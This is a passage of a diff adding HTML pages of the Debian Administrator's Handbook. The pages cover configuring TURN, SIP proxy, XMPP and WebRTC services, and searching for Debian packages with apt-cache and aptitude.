+; IPv4 and IPv6 addresses for SIP
+sip-proxy          IN     A      198.51.100.19
+sip-proxy          IN     AAAA   2001:DB8:1000:2000::19
+
+; IPv4 and IPv6 addresses for XMPP
+xmpp-gw            IN     A      198.51.100.19
+xmpp-gw            IN     AAAA   2001:DB8:1000:2000::19
+
+; DNS SRV and NAPTR for STUN / TURN
+_stun._udp  IN SRV    0 1 3467 turn-server.falcot.com.
+_turn._udp  IN SRV    0 1 3467 turn-server.falcot.com.
+@           IN NAPTR  10 0 "s" "RELAY:turn.udp" "" _turn._udp.falcot.com.
+
+; DNS SRV and NAPTR records for SIP
+_sips._tcp  IN SRV    0 1 5061 sip-proxy.falcot.com.
+@           IN NAPTR  10 0 "s" "SIPS+D2T" "" _sips._tcp.falcot.com.
+
+; DNS SRV records for XMPP Server and Client modes:
+_xmpp-client._tcp  IN     SRV    5 0 5222 xmpp-gw.falcot.com.
+_xmpp-server._tcp  IN     SRV    5 0 5269 xmpp-gw.falcot.com.
+</pre></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.turn-server"></a>11.8.2. TURN Server</h3></div></div></div><div
+            class="para">
+				TURN is a service that helps clients behind NAT routers and firewalls to discover the most efficient way to communicate with other clients and to relay the media streams if no direct media path can be found. It is highly recommended that the TURN server is installed before any of the other RTC services are offered to end users.
+			</div><a
+            id="id-1.14.11.12.3"
+            class="indexterm"></a><div
+            class="para">
+				TURN and the related ICE protocol are open standards. To benefit from these protocols, maximizing connectivity and minimizing user frustration, it is important to ensure that all client software supports ICE and TURN.
+			</div><a
+            id="id-1.14.11.12.5"
+            class="indexterm"></a><div
+            class="para">
+				For the ICE algorithm to work effectively, the server must have two public IPv4 addresses.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.turn-server-install"></a>11.8.2.1. Install the TURN server</h4></div></div></div><div
+              class="para">
+					Install the <span
+                class="pkg pkg">resiprocate-turn-server</span> package.
+				</div><div
+              class="para">
+					Edit the <code
+                class="filename">/etc/reTurn/reTurnServer.config</code> configuration file. The most important thing to do is insert the IP addresses of the server.
+				</div><pre
+              class="programlisting">
+# your IP addresses go here:
+TurnAddress = 198.51.100.19
+TurnV6Address = 2001:DB8:1000:2000::19
+AltStunAddress = 198.51.100.20
+# your domain goes here, it must match the value used
+# to hash your passwords if they are already hashed
+# using the HA1 algorithm:
+AuthenticationRealm = myrealm
+
+UserDatabaseFile = /etc/reTurn/users.txt
+UserDatabaseHashedPasswords = true
+</pre><div
+              class="para">
+					Restart the service.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.turn-server-management"></a>11.8.2.2. Managing the TURN users</h4></div></div></div><div
+              class="para">
+					Use the htdigest utility to manage the TURN server user list.
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>htdigest /etc/reTurn/users.txt myrealm joe</code></strong></pre><div
+              class="para">
+					Use the HUP signal to make the server reload the <code
+                class="filename">/etc/reTurn/users.txt</code> file after changing it or enable the automatic reload feature in <code
+                class="filename">/etc/reTurn/reTurnServer.config</code>.
+				</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.sip-server"></a>11.8.3. SIP Proxy Server</h3></div></div></div><div
+            class="para">
+				A SIP proxy server manages the incoming and outgoing SIP connections between other organizations, SIP trunking providers, SIP PBXes such as Asterisk, SIP phones, SIP-based softphones and WebRTC applications.
+			</div><a
+            id="id-1.14.11.13.3"
+            class="indexterm"></a><a
+            id="id-1.14.11.13.4"
+            class="indexterm"></a><a
+            id="id-1.14.11.13.5"
+            class="indexterm"></a><a
+            id="id-1.14.11.13.6"
+            class="indexterm"></a><div
+            class="para">
+				It is strongly recommended to install and configure the SIP proxy before attempting a SIP PBX setup. The SIP proxy normalizes a lot of the traffic reaching the PBX and provides greater connectivity and resilience.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.sip-server-install"></a>11.8.3.1. Install the SIP proxy</h4></div></div></div><div
+              class="para">
+					Install the <span
+                class="pkg pkg">repro</span> package. Using the package from <span
+                class="distribution distribution">jessie-backports</span> is highly recommended, as it has the latest improvements for maximizing connectivity and resilience.
+				</div><a
+              id="id-1.14.11.13.8.3"
+              class="indexterm"></a><div
+              class="para">
+					Edit the <code
+                class="filename">/etc/repro/repro.config</code> configuration file. The most important thing to do is insert the IP addresses of the server. The example below demonstrates how to setup both regular SIP and WebSockets/WebRTC, using TLS, IPv4 and IPv6:
+				</div><pre
+              class="programlisting">
+# Transport1 will be for SIP over TLS connections
+# We use port 5061 here but if you have clients connecting from
+# locations with firewalls you could change this to listen on port 443
+Transport1Interface = 198.51.100.19:5061
+Transport1Type = TLS
+Transport1TlsDomain = falcot.com
+Transport1TlsClientVerification = Optional
+Transport1RecordRouteUri = sip:falcot.com;transport=TLS
+Transport1TlsPrivateKey = /etc/ssl/private/falcot.com-key.pem
+Transport1TlsCertificate = /etc/ssl/public/falcot.com.pem
+
+# Transport2 is the IPv6 version of Transport1
+Transport2Interface = 2001:DB8:1000:2000::19:5061
+Transport2Type = TLS
+Transport2TlsDomain = falcot.com
+Transport2TlsClientVerification = Optional
+Transport2RecordRouteUri = sip:falcot.com;transport=TLS
+Transport2TlsPrivateKey = /etc/ssl/private/falcot.com-key.pem
+Transport2TlsCertificate = /etc/ssl/public/falcot.com.pem
+
+# Transport3 will be for SIP over WebSocket (WebRTC) connections
+# We use port 8443 here but you could use 443 instead
+Transport3Interface = 198.51.100.19:8443
+Transport3Type = WSS
+Transport3TlsDomain = falcot.com
+# This would require the browser to send a certificate, but browsers
+# don't currently appear to be able to, so leave it as None:
+Transport3TlsClientVerification = None
+Transport3RecordRouteUri = sip:falcot.com;transport=WSS
+Transport3TlsPrivateKey = /etc/ssl/private/falcot.com-key.pem
+Transport3TlsCertificate = /etc/ssl/public/falcot.com.pem
+
+# Transport4 is the IPv6 version of Transport3
+Transport4Interface = 2001:DB8:1000:2000::19:8443
+Transport4Type = WSS
+Transport4TlsDomain = falcot.com
+Transport4TlsClientVerification = None
+Transport4RecordRouteUri = sip:falcot.com;transport=WSS
+Transport4TlsPrivateKey = /etc/ssl/private/falcot.com-key.pem
+Transport4TlsCertificate = /etc/ssl/public/falcot.com.pem
+
+# Transport5: this could be for TCP connections to an Asterisk server
+# in your internal network.  Don't allow port 5060 through the external
+# firewall.
+Transport5Interface = 198.51.100.19:5060
+Transport5Type = TCP
+Transport5RecordRouteUri = sip:198.51.100.19:5060;transport=TCP
+
+HttpBindAddress = 198.51.100.19, 2001:DB8:1000:2000::19
+HttpAdminUserFile = /etc/repro/users.txt
+
+RecordRouteUri = sip:falcot.com;transport=tls
+ForceRecordRouting = true
+EnumSuffixes = e164.arpa, sip5060.net, e164.org
+DisableOutbound = false
+EnableFlowTokens = true
+EnableCertificateAuthenticator = True
+</pre><div
+              class="para">
+					Use the <code
+                class="command">htdigest</code> utility to manage the admin password for the web interface. The username must be <span
+                class="emphasis"><em>admin</em></span> and the realm name must match the value specified in <code
+                class="filename">repro.config</code>.
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>htdigest /etc/repro/users.txt repro admin</code></strong></pre><div
+              class="para">
+					Restart the service to use the new configuration.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.sip-server-management"></a>11.8.3.2. Managing the SIP proxy</h4></div></div></div><div
+              class="para">
+					Go to the web interface at <code
+                class="literal">http://sip-proxy.falcot.com:5080</code> to complete the configuration by adding domains, local users and static routes.
+				</div><div
+              class="para">
+					The first step is to add the local domain. The process must be restarted after adding or removing domains from the list.
+				</div><div
+              class="para">
+					The proxy knows how to route calls between local users and full SIP address, the routing configuration is only necessary for overriding default behavior, for example, to recognize phone numbers, add a prefix and route them to a SIP provider.
+				</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.xmpp-server"></a>11.8.4. XMPP Server</h3></div></div></div><div
+            class="para">
+				An XMPP server manages connectivity between local XMPP users and XMPP users in other domains on the public Internet.
+			</div><a
+            id="id-1.14.11.14.3"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>VOCABULARY</em></span> XMPP or Jabber?</strong></p></div></div></div><a
+              id="id-1.14.11.14.4.2"
+              class="indexterm"></a><div
+              class="para">
+				XMPP is sometimes referred to as Jabber. In fact, Jabber is a trademark and XMPP is the official name of the standard.
+			</div><a
+              id="id-1.14.11.14.4.4"
+              class="indexterm"></a></div><div
+            class="para">
+				Prosody is a popular XMPP server that operates reliably on Debian servers.
+			</div><a
+            id="id-1.14.11.14.6"
+            class="indexterm"></a><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.xmpp-server-install"></a>11.8.4.1. Install the XMPP server</h4></div></div></div><div
+              class="para">
+					Install the <span
+                class="pkg pkg">prosody</span> package. Using the package from <span
+                class="distribution distribution">jessie-backports</span> is highly recommended, as it has the latest improvements for maximizing connectivity and resilience.
+				</div><a
+              id="id-1.14.11.14.7.3"
+              class="indexterm"></a><div
+              class="para">
+					Review the <code
+                class="filename">/etc/prosody/prosody.cfg.lua</code> configuration file. The most important thing to do is insert JIDs of the users who are permitted to manage the server.
+				</div><pre
+              class="programlisting">
+admins = { "joe@falcot.com" }
+</pre><div
+              class="para">
+					An individual configuration file is also needed for each domain. Copy the sample from <code
+                class="filename">/etc/prosody/conf.avail/example.com.cfg.lua</code> and use it as a starting point. Here is <code
+                class="literal">falcot.com.cfg.lua</code>:
+				</div><pre
+              class="programlisting">
+VirtualHost "falcot.com"
+        enabled = true
+        ssl = {
+                key = "/etc/ssl/private/falcot.com-key.pem";
+                certificate = "/etc/ssl/public/falcot.com.pem";
+                }
+</pre><div
+              class="para">
+					To enable the domain, there must be a symlink from <code
+                class="filename">/etc/prosody/conf.d/</code>. Create it that way:
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>ln -s /etc/prosody/conf.avail/falcot.com.cfg.lua /etc/prosody/conf.d/</code></strong></pre><div
+              class="para">
+					Restart the service to use the new configuration.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.xmpp-server-management"></a>11.8.4.2. Managing the XMPP server</h4></div></div></div><div
+              class="para">
+					Some management operations can be performed using the <code
+                class="literal">prosodyctl</code> command line utility. For example, to add the administrator account specified in <code
+                class="filename">/etc/prosody/prosody.cfg.lua</code>:
+				</div><pre
+              class="programlisting">
+# prosodyctl adduser joe@falcot.com
+</pre><div
+              class="para">
+					See the <a
+                href="http://prosody.im/doc/configure"> Prosody online documentation</a> for more details about how to customize the configuration.
+				</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.rtc-port-443"></a>11.8.5. Running services on port 443</h3></div></div></div><div
+            class="para">
+				Some administrators prefer to run all of their RTC services on port 443. This helps users to connect from remote locations such as hotels and airports where other ports may be blocked or Internet traffic is routed through HTTP proxy servers.
+			</div><div
+            class="para">
+				To use this strategy, each service (SIP, XMPP and TURN) needs a different IP address. All the services can still be on the same host as Linux supports multiple IP addresses on a single host. The port number, 443, must be specified in the configuration files for each process and also in the DNS SRV records.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.rtc-webrtc"></a>11.8.6. Adding WebRTC</h3></div></div></div><div
+            class="para">
+				Falcot wants to let customers make phone calls directly from the web site. The Falcot administrators also want to use WebRTC as part of their disaster recovery plan, so staff can use web browsers at home to log in to the company phone system and work normally in an emergency.
+			</div><a
+            id="id-1.14.11.16.3"
+            class="indexterm"></a><a
+            id="id-1.14.11.16.4"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> Try WebRTC</strong></p></div></div></div><a
+              id="id-1.14.11.16.5.2"
+              class="indexterm"></a><div
+              class="para">
+				If you have not tried WebRTC before, there are various sites that give an online demonstration and test facilities. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.sip5060.net/test-calls">http://www.sip5060.net/test-calls</a></div>
+			</div></div><div
+            class="para">
+				WebRTC is a rapidly evolving technology and it is essential to use packages from the <span
+              class="distribution distribution">jessie-backports</span> or <span
+              class="distribution distribution">Testing</span> distributions.
+			</div><div
+            class="para">
+				JSCommunicator is a generic, unbranded WebRTC phone that does not require any server-side scripting such as PHP. It is built exclusively with HTML, CSS and JavaScript. It is the basis for many other WebRTC services and modules for more advanced web publishing frameworks. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://jscommunicator.org">http://jscommunicator.org</a></div>
+			</div><a
+            id="id-1.14.11.16.8"
+            class="indexterm"></a><div
+            class="para">
+				The package <span
+              class="pkg pkg">jscommunicator-web-phone</span> is the quickest way to install a WebRTC phone into a web site. It requires a SIP proxy with a WebSocket transport. The instructions in <a
+              class="xref"
+              href="sect.rtc-services.html#sect.sip-server-install">11.8.3.1 – „Install the SIP proxy“</a> include the necessary details to enable the WebSocket transport in the <span
+              class="pkg pkg">repro</span> SIP proxy.
+			</div><div
+            class="para">
+				After installing <span
+              class="pkg pkg">jscommunicator-web-phone</span>, there are various ways to use it. A simple strategy is to include or copy the configuration from <code
+              class="filename">/etc/jscommunicator-web-phone/apache.conf</code> into an Apache virtual host configuration.
+			</div><div
+            class="para">
+				Once the web-phone files are available in the web server, customize the <code
+              class="filename">/etc/jscommunicator-web-phone/config.js</code> to point at the TURN server and SIP proxy. For example:
+			</div><pre
+            class="programlisting">
+JSCommSettings = {
+
+  // Web server environment
+  webserver: {
+    url_prefix: null            // If set, prefix used to construct sound/ URLs
+  },
+
+  // STUN/TURN media relays
+  stun_servers: [],
+  turn_servers: [
+    { server:"turn:turn-server.falcot.com?transport=udp", username:"joe", password:"j0Ep455d" }
+  ],
+
+  // WebSocket connection
+  websocket: {
+      // Notice we use the falcot.com domain certificate and port 8443
+      // This matches the Transport3 and Transport4 example in
+      // the falcot.com repro.config file
+    servers: 'wss://falcot.com:8443',
+    connection_recovery_min_interval: 2,
+    connection_recovery_max_interval: 30
+  },
+
+  ...
+</pre><div
+            class="para">
+				More advanced click-to-call web sites typically use server-side scripting to generate the <code
+              class="literal">config.js</code> file dynamically. The <a
+              href="http://drucall.org">DruCall</a> source code demonstrates how to do this with PHP.
+			</div><a
+            id="id-1.14.11.16.14"
+            class="indexterm"></a><div
+            class="para">
+				This chapter sampled only a fraction of the available server software; however, most of the common network services were described. Now it is time for an even more technical chapter: we'll go into deeper detail for some concepts, describe massive deployments and virtualization.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.ldap-directory.html"><strong>Předcházející</strong>11.7. LDAP Directory</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="advanced-administration.html"><strong>Další</strong>Kapitola 12. Advanced Administration</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.searching-packages.html b/tmp/cs-CZ/html/sect.searching-packages.html
new file mode 100644
index 000000000..c5e43d169
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.searching-packages.html
@@ -0,0 +1,214 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">6.9. Searching for Packages</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="apt, apt-get, apt-cache, aptitude, synaptic, sources.list, apt-cdrom" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><link
+        rel="prev"
+        href="sect.automatic-upgrades.html"
+        title="6.8. Automatic Upgrades" /><link
+        rel="next"
+        href="solving-problems.html"
+        title="Kapitola 7. Solving Problems and Finding Relevant Information" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.searching-packages.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.automatic-upgrades.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="solving-problems.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.searching-packages"></a>6.9. Searching for Packages</h2></div></div></div><div
+          class="para">
+			With the large and ever-growing amount of software in Debian, there emerges a paradox: Debian usually has a tool for most tasks, but that tool can be very difficult to find amongst the myriad other packages. The lack of appropriate ways to search for (and to find) the right tool has long been a problem. Fortunately, this problem has almost entirely been solved.
+		</div><div
+          class="para">
+			The most trivial search possible is looking up an exact package name. If <code
+            class="command">apt show <em
+              class="replaceable">package</em></code> returns a result, then the package exists. Unfortunately, this requires knowing or even guessing the package name, which isn't always possible.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>TIP</em></span> Package naming conventions</strong></p></div></div></div><div
+            class="para">
+			Some categories of packages are named according to a conventional naming scheme; knowing the scheme can sometimes allow you to guess exact package names. For instance, for Perl modules, the convention says that a module called <code
+              class="literal">XML::Handler::Composer</code> upstream should be packaged as <span
+              class="pkg pkg">libxml-handler-composer-perl</span>. The library enabling the use of the <code
+              class="command">gconf</code> system from Python is packaged as <span
+              class="pkg pkg">python-gconf</span>. It is unfortunately not possible to define a fully general naming scheme for all packages, even though package maintainers usually try to follow the choice of the upstream developers.
+		</div></div><div
+          class="para">
+			A slightly more successful searching pattern is a plain-text search in package names, but it remains very limited. You can generally find results by searching package descriptions: since each package has a more or less detailed description in addition to its package name, a keyword search in these descriptions will often be useful. <code
+            class="command">apt-cache</code> and <code
+            class="command">axi-cache</code> are the tools of choice for this kind of search; for instance, <code
+            class="command">apt-cache search video</code> will return a list of all packages whose name or description contains the keyword “video”.
+		</div><div
+          class="para">
+			For more complex searches, a more powerful tool such as <code
+            class="command">aptitude</code> is required. <code
+            class="command">aptitude</code> allows you to search according to a logical expression based on the package's meta-data fields. For instance, the following command searches for packages whose name contains <code
+            class="literal">kino</code>, whose description contains <code
+            class="literal">video</code> and whose maintainer's name contains <code
+            class="literal">paul</code>:
+		</div><pre
+          class="screen">$ <strong
+            class="userinput"><code>aptitude search kino~dvideo~mpaul</code></strong>
+p   kino  - Non-linear editor for Digital Video data
+$ <strong
+            class="userinput"><code>aptitude show kino</code></strong>
+Package: kino
+Version: 1.3.4-2.2+b2
+State: not installed
+Priority: extra
+Section: video
+Maintainer: Paul Brossier &lt;piem@debian.org&gt;
+Architecture: amd64
+Uncompressed Size: 8300 k
+Depends: libasound2 (&gt;= 1.0.16), libatk1.0-0 (&gt;= 1.12.4), libavc1394-0
+         (&gt;= 0.5.3), libavcodec57 (&gt;= 7:3.2.4) | libavcodec-extra57 (&gt;=
+         7:3.2.4), libavformat57 (&gt;= 7:3.2.4), libavutil55 (&gt;= 7:3.2.4), libc6
+         (&gt;= 2.14), libcairo2 (&gt;= 1.2.4), libdv4 (&gt;= 1.0.0), libfontconfig1
+         (&gt;= 2.11), libfreetype6 (&gt;= 2.2.1), libgcc1 (&gt;= 1:3.0),
+         libgdk-pixbuf2.0-0 (&gt;= 2.22.0), libglade2-0 (&gt;= 1:2.6.4-2~), libglib2.0-0
+         (&gt;= 2.16.0), libgtk2.0-0 (&gt;= 2.24.0), libice6 (&gt;= 1:1.0.0),
+         libiec61883-0 (&gt;= 1.2.0), libpango-1.0-0 (&gt;= 1.14.0), libpangocairo-1.0-0
+         (&gt;= 1.14.0), libpangoft2-1.0-0 (&gt;= 1.14.0), libquicktime2 (&gt;=
+         2:1.2.2), libraw1394-11, libsamplerate0 (&gt;= 0.1.7), libsm6, libstdc++6
+         (&gt;= 5.2), libswscale4 (&gt;= 7:3.2.4), libx11-6, libxext6, libxml2 (&gt;=
+         2.7.4), libxv1, zlib1g (&gt;= 1:1.1.4)
+Recommends: ffmpeg, curl
+Suggests: udev | hotplug, vorbis-tools, sox, mjpegtools, lame, ffmpeg2theora
+Conflicts: kino-dvtitler, kino-timfx, kinoplus, kino-dvtitler:i386, kino-timfx:i386,
+           kinoplus:i386, kino:i386
+Replaces: kino-dvtitler, kino-timfx, kinoplus, kino-dvtitler:i386, kino-timfx:i386,
+          kinoplus:i386
+Provides: kino-dvtitler, kino-timfx, kinoplus
+Description: Non-linear editor for Digital Video data
+ Kino allows you to record, create, edit, and play movies recorded with DV camcorders.
+ This program uses many keyboard commands for fast navigating and editing inside the
+ movie.
+ 
+ The kino-timfx, kino-dvtitler and kinoplus sets of plugins, formerly distributed as
+ separate packages, are now provided with Kino.
+Homepage: http://www.kinodv.org/
+Tags: field::arts, hardware::camera, implemented-in::c, implemented-in::c++,
+      interface::graphical, interface::x11, role::program, scope::application,
+      suite::gnome, uitoolkit::gtk, use::editing, use::learning,
+      works-with::video, x11::application
+</pre><div
+          class="para">
+			The search only returns one package, <span
+            class="pkg pkg">kino</span>, which satisfies all three criteria.
+		</div><div
+          class="para">
+			Even these multi-criteria searches are rather unwieldy, which explains why they are not used as much as they could. A new tagging system has therefore been developed, and it provides a new approach to searching. Packages are given tags that provide a thematical classification along several strands, known as a “facet-based classification”. In the case of <span
+            class="pkg pkg">kino</span> above, the package's tags indicate that Kino is a Gnome-based software that works on video data and whose main purpose is editing.
+		</div><div
+          class="para">
+			Browsing this classification can help you to search for a package which corresponds to known needs; even if it returns a (moderate) number of hits, the rest of the search can be done manually. To do that, you can use the <code
+            class="literal">~G</code> search pattern in <code
+            class="command">aptitude</code>, but it is probably easier to simply navigate the site where tags are managed: <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://debtags.debian.org/">https://debtags.debian.org/</a></div>
+		</div><a
+          id="id-1.9.18.11"
+          class="indexterm"></a><a
+          id="id-1.9.18.12"
+          class="indexterm"></a><div
+          class="para">
+			Selecting the <code
+            class="literal">works-with::video</code> and <code
+            class="literal">use::editing</code> tags yields a handful of packages, including the <span
+            class="pkg pkg">kino</span> and <span
+            class="pkg pkg">pitivi</span> video editors. This system of classification is bound to be used more and more as time goes on, and package managers will gradually provide efficient search interfaces based on it.
+		</div><div
+          class="para">
+			To sum up, the best tool for the job depends on the complexity of the search that you wish to do:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					<code
+                  class="command">apt-cache</code> only allows searching in package names and descriptions, which is very convenient when looking for a particular package that matches a few target keywords;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					when the search criteria also include relationships between packages or other meta-data such as the name of the maintainer, <code
+                  class="command">synaptic</code> will be more useful;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					when a tag-based search is needed, a good tool is <code
+                  class="command">packagesearch</code>, a graphical interface dedicated to searching available packages along several criteria (including the names of the files that they contain). For usage on the command-line, <code
+                  class="command">axi-cache</code> will fit the bill.
+				</div><a
+                id="id-1.9.18.15.3.2"
+                class="indexterm"></a><a
+                id="id-1.9.18.15.3.3"
+                class="indexterm"></a></li><li
+              class="listitem"><div
+                class="para">
+					finally, when the searches involve complex expressions with logic operations, the tool of choice will be <code
+                  class="command">aptitude</code>'s search pattern syntax, which is quite powerful despite being somewhat obscure; it works in both the command-line and the interactive modes.
+				</div></li></ul></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.automatic-upgrades.html"><strong>Předcházející</strong>6.8. Automatic Upgrades</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="solving-problems.html"><strong>Další</strong>Kapitola 7. Solving Problems and Finding Relevant...</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.selected-approach.html b/tmp/cs-CZ/html/sect.selected-approach.html
new file mode 100644
index 000000000..5f4a0d989
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.selected-approach.html
@@ -0,0 +1,82 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">3. Obecný přístup</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="foreword.html"
+        title="Předmluva" /><link
+        rel="prev"
+        href="sect.who-is-this-book-for.html"
+        title="2. Pro koho je tato kniha?" /><link
+        rel="next"
+        href="sect.book-structure.html"
+        title="4. truktura knihy" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.selected-approach.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.who-is-this-book-for.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.book-structure.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.selected-approach"></a>3. Obecný přístup</h2></div></div></div><div
+          class="para">
+			Veškerá obecná dokumentace, kterou o GNU/Linuxu najdete, se vztahuje i na Debian, protože Debian věšinou obsahuje běžný svobodný software. Nicméně, distribuce přináší mnoho vylepšení, což je důvod, proč jsme se rozhodli především popsat “Debianovský způsob” dělání věci.
+		</div><div
+          class="para">
+			Je zajímavé sledovat doporučení Debianu ale ještě lepší je pochopit jejich původ. Proto se nebudeme omezovat pouze na praktická vysvětlení; Budeme také popisovat práci projektu, abychom vám poskytli komplexní a konzistentní znalosti.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.who-is-this-book-for.html"><strong>Předcházející</strong>2. Pro koho je tato kniha?</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.book-structure.html"><strong>Další</strong>4. truktura knihy</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.selinux.html b/tmp/cs-CZ/html/sect.selinux.html
new file mode 100644
index 000000000..5fd0681e7
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.selinux.html
@@ -0,0 +1,844 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
